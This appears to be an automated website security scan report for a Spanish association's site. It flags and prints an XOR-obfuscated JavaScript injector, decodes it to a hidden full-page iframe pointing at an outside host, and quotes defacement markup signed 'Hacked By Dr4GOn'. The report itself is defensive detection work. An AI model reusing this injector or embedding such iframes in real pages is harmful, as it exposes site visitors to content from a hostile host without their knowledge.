Scanned pages/files
Request | Server response | Status |
http://www.asociacionmanuelazana.com/ | 200 OK Content-Length: 11983 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame.
var enkripsi="'02'02'02'02'1Akdpcog'02qpa'1F'00jvvr'1C--`cn{cl,kp-fgom-pf,jvon'00'02qapmnnkle'1F'00lm'00'02jgkejv'1F'00332'07'00'02ukfvj'1F'00322'07'00'02kf'1F'00dpo'00'1G'1A-kdpcog'1G"; teks=""; teksasli="";var panjang;panjang=enkripsi.length;for (i=0;i<panjang;i++){ teks+=String.fromCharCode(enkripsi.charCodeAt(i)^2) }teksasli=unescape(teks);document.write(teksasli);
Decoded script: <iframe src="http://balyan.ir/demo/rd.html" scrolling="no" height="110%" width="100%" id="frm"></iframe>
Deface/Content modification. The following signature was found: Hacked By Dr4GOn
<!DOCTYPE html> <html lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <meta charset="utf-8" /> <title>Hacked By Dr4GOn</title> <style> #frm{ border:none; overflow:no-content; position:absolute; top:0; left:0; z-index:-100; } .wrapper{ width:100%; height:100%; background:transparent; position:absolute; z-index:-99; top:0; ...[13399 bytes skipped]...
http://www.asociacionmanuelazana.com/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 18 Nov 2015 20:33:02 GMT Location: http://www.asociacionmanuelazana.com Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.asociacionmanuelazana.com/xmlrpc.php | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: asociacionmanuelazana.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: asociacionmanuelazana.com
Referer: http://www.google.com/search?q=asociacionmanuelazana.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=asociacionmanuelazana.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://asociacionmanuelazana.com/
Result: asociacionmanuelazana.com is not infected or malware details are not published yet.